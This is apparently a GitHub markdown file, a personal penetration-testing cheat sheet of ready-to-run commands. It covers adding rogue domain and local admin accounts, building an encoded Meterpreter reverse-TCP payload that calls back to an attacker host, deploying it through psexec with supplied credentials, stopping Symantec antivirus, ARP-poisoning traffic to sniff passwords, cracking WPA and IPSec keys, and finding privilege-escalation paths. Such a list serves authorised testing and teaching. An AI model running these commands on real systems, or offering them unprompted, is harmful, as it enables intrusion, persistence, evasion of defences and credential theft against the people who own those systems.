Skip to content

Latest commit

 

History

History
166 lines (113 loc) · 6.05 KB

pentest.md

File metadata and controls

166 lines (113 loc) · 6.05 KB

Pentesting Cheat Sheet

These are various tips and tricks I have found useful on my pentest engagements. Most of these can be found using Google but I decided to put them in a central location to make them easily accessible. Hope they are as helpful to you as they are to me.

Mounting Shares

To mount an SMB share using a null session do one of the following depending on the OS you are using.

Windows> net use x: \\server\share "" /u:
Linux> mount -t cifs //server/share -o username=,password= /mnt/point

To mount an NFS share on Linux use.

mount -t nfs server:/share /mnt/point

Administrative Accounts

Add a new Windows domain admin account.

net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

Add a new Windows local admin account.

net user username password /ADD
net localgroup Administrators username /ADD

Add a new linux account and put them in the wheel group.

useradd -G wheel username && echo "username:newpass"|chpasswd

Meterpreter Shell Error

If you get the error, "stdapi_sys_process_execute: Operation failed: 1314", while trying to drop to as shell in meterpreter, try the code below. This is a known bug in meterpreter.

execute -f cmd.exe -c -i -H

Metasploit: Custom Psexec Executable

The first thing we need to do is generate a custom executable to use with Meterpreter.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

Next we need to setup a multi handler to listen for connections.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

In another msfconsole session we need to configure the psexec exploit module to use our custom executable.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe

Finally, we need to run the exploit. If everything worked then you should see a new meterpreter session open in multi/handler

msf exploit(psexec) > exploit

Disable Antivirus

This command will disable Symantec Endpoint Protection. I find it useful when I have a basic shell on a box and want to upgrade to Meterpreter but Symantec stops me.

c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic

Ettercap allows us to do arp poisoning and sniff plaintext passwords.

ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK

Use JtR to generate candidate passwords for aircrack-ng

john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap

Use Hashcat to generate candidate passwords for aircrack-ng

./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap

Cracking IPSec Agressive Mode Pre-Shared Key

If you’ve never done this, read these first. http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html

To find aggressive mode VPNS use ike-scan.

ike-scan -A 192.168.1.0/24

If the default transforms don't work use the generate_transforms.sh script from the user guide above.

generate-transforms.sh | xargs --max-lines=8 ike-scan 10.0.0.0/24

If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN

ike-scan 192.168.1.1 -A -id GroupVPN

Use the -P argument to save the handshake to a file, which can be used by psk-crack.

ike-scan 192.168.1.1 -A -Ppsk_192.168.1.1.txt

Use a dictionary to crack the pre-shared key.

psk-crack -d /path/to/dictionary psk_192.168.1.1.txt

Basic Scanning with Nmap

Discovery Scans:

nmap -v -n -PE <target>
nmap -v -n -PE -PO -PM -PP <target>
nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>

Detailed TCP Scans:

nmap -v -sS -A --top-ports 10 -oA filename <target>
nmap -v -sS -A -F -oA filename <target>
nmap -v -sS -A -oA filename <target>
nmap -v -sS -A -p 1-65535 -oA filename <target>

Detailed UDP Scans:

nmap -v -sU -A --top-ports 10 -oA filename <target>
nmap -v -sU -A -F -oA filename <target>
nmap -v -sU -A -oA filename <target>
nmap -v -sU -A -p 1-65535 -oA filename <target>

Create an IP List with Nmap

I find this particularly useful for tools or scripts that operate on new line delimited list of IP addresses. I can use the simple Nmap syntax to create a file with the list of appropriate IPs.

nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules

At one point Korelogic released a set of John the Ripper rules in a john.conf file. This bash one liner would grab each ruleset and run JtR with the specified ruleset.

for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done

Unquoted Service Paths

Identify unquoted service paths that may be useful for privilege escalation.

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

https://www.commonexploits.com/unquoted-service-paths/